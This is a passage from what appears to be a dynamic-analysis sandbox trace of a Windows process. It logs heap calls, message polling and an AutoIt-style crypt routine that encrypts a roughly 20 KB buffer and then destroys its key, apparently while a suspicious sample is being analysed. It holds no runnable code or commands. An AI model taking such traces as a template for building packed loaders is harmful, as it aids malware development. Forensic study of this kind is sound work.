hHeap=0x770000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.254] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.254] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.255] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.255] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0033.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.255] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.255] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.255] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.255] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.255] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.256] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.256] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.256] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.256] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.256] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x5198, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x51a0) returned 1 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.256] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.257] CharLowerBuffW (in: lpsz="byte[20897]", cchLength=0xb | out: lpsz="byte[20897]") returned 0xb [0033.257] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.258] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.258] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.258] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.258] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.258] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x93a1a8*, pdwDataLen=0x6ae220*=0x5198, dwBufLen=0x51a0 | out: pbData=0x93a1a8*, pdwDataLen=0x6ae220*=0x51a0) returned 1 [0033.258] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.258] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.259] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.260] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.260] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.260] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0033.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.260] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.260] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.260] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.262] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.263] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.263] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.265] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.265] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.265] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.265] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.265] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.265] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.265] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.265] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.265] CryptDestroyKey (hKey=0x7c2280) returned 1 [0033.266] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.266] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.266] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.266] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.266] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.266] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.266] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0033.266] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.266] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.266] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.267] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.267] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.267] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.267] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.267] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.267] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.267] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.267] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.267] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.268] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.268] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.268] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0033.268] FreeLibrary (hLibModule=0x754b0000) returned 1 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0033.268] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, 